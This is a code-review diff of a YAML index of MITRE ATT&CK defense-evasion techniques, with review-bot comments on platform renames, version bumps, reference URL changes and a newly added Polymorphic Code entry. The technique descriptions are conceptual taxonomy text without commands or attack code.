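Review bot: the `Leitch Hollowing` reference URL is replaced, from `http://www.autosectools.com/process-hollowing.pdf` to `https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf`, with the retrieval date moved from November 12, 2014 to September 12, 2024. That is a third-party mirror of the original paper rather than the author's host, so please confirm the mirrored PDF is the same document before accepting the citation change. The `x_mitre_attack_spec_version` bump from `3.1.0` to `3.2.0` and the `modified` move to `2024-09-12` are consistent with each other.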
@@ -9860,7 +9945,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -9882,7 +9967,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -9957,6 +10041,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
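Review bot: a new data source, `'Application Log: Application Log Content'`, is added to T1027's `x_mitre_data_sources` list, but nothing in this hunk shows a corresponding change to the object's `modified` or `x_mitre_version`. Please confirm those fields are updated elsewhere in the T1027 block; a data-source change without a version or timestamp change would be inconsistent with how the other techniques in this patch are handled.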
@@ -10016,12 +10101,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -10050,24 +10134,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
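Review bot: T1556.006 gets the same platform consolidation as T1078 above (`Azure AD`, `Office 365` and `Google Workspace` removed; `Office Suite` and `Identity Provider` added), plus a new contributor, `Arun Seelagan, CISA`, and `x_mitre_version` from `'1.2'` to `'1.3'`. The same concern applies: anything keyed on the old platform names will no longer select this technique, so whatever mapping is adopted for T1078 should be applied and documented consistently here. The `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` lines inserted in this hunk are the ones removed from the end of the object in the next hunk, so that is a reorder, not a change.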
@@ -10102,9 +10188,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -10127,7 +10210,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -10145,8 +10228,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -10185,7 +10266,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10228,10 +10309,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
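Review bot: the new T1027.014 (Polymorphic Code) object ships with `x_mitre_detection: ''` even though it lists three data sources and `x_mitre_defense_bypassed: Signature-based Detection`; if anything downstream renders the detection field, it will show blank for this technique, so consider whether the generator should omit empty detection strings rather than emit them. The `polymorphic-blackberry` description carries a doubled terminator (`Malware?.`), which looks like upstream text and should be left unless descriptions are normalised here. `atomic_tests: []` is expected for a freshly imported technique.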
@@ -10275,7 +10424,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10300,8 +10449,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -10332,7 +10479,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -10351,7 +10498,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -10446,11 +10592,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10530,11 +10675,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10599,12 +10743,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10653,8 +10796,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
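Review bot: the reference URL host changes from twitter.com to x.com with the retrieval date updated to September 12, 2024; the status id is unchanged, so this is the same source and the change is fine. The pre-existing `Carr, N..` double period in the unchanged description line sits in the same reference, so if descriptions are editable in this file it could be fixed in the same touch; if they mirror upstream, leave it.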
@@ -10669,14 +10812,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10688,7 +10830,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
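Review bot: the contributor entry is reordered from `Goldstein Menachem` to `Menachem Goldstein`; the `modified` bump in the preceding hunk covers this as an upstream correction, but if contributor strings are ever used as keys for deduplication or attribution across the index, the rename will appear as a new person, so any such tooling should be checked.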
@@ -10718,13 +10860,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10785,7 +10926,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -10841,11 +10981,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10869,11 +11008,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
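Review bot: `Office 365` and `Google Workspace` collapse into `Office Suite` for T1550.004 with a 1.3 to 1.4 bump; unlike the first hunk in this series no `Identity Provider` entry is added, which fits a session-cookie technique scoped to SaaS and reads as intended. Any per-platform index that is generated from `x_mitre_platforms` (a Google Workspace or Office 365 view) will lose this technique under the old name, so those derived files should be regenerated in the same change.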
@@ -10898,9 +11036,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -10980,7 +11117,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -11014,7 +11150,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -11041,8 +11177,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
@@ -11137,48 +11271,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests: []
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
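Review bot: the new description line adds `ilasm.exe(Citation: ATTACK IQ)` to the list of compilers, but the unchanged `x_mitre_detection` text immediately below still names only `csc.exe and GCC/MinGW`; if detection text is maintained in this file rather than mirrored from upstream, `ilasm.exe` should be added there so the guidance matches the description. The rest of the hunk is a key reorder (platforms, domains, contributors and references move to new positions, shown re-added in the following hunks) plus one new contributor, so no other semantic change.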
@@ -11187,9 +11297,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -11201,12 +11316,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests: []
T1564.007:
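Review bot: `x_mitre_permissions_required: - User` is dropped from T1027.004 with nothing replacing it, while `x_mitre_system_requirements` is kept. If the field is being retired under spec 3.2.0 that is fine, but other objects in this patch (T1564.006, T1134.005, T1218.009) still carry `x_mitre_permissions_required` in their unchanged context, so the index now treats the field inconsistently across techniques; either note this as upstream-driven or have the generator handle it uniformly. The reference block is otherwise a reorder plus the new `ATTACK IQ` entry that the description now cites.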
@@ -11254,7 +11392,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11280,12 +11418,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11375,7 +11511,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -11433,12 +11568,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -11480,10 +11614,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
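Review bot: same platform consolidation as T1550.004 (`Office 365` and `Google Workspace` to `Office Suite`) with a 1.0 to 1.1 bump for T1656; the `modified` value in the previous hunk moves forward to 2024-10-15, so this one is consistent with an upstream refresh. The same per-platform index regeneration caveat applies.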
@@ -11507,18 +11640,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
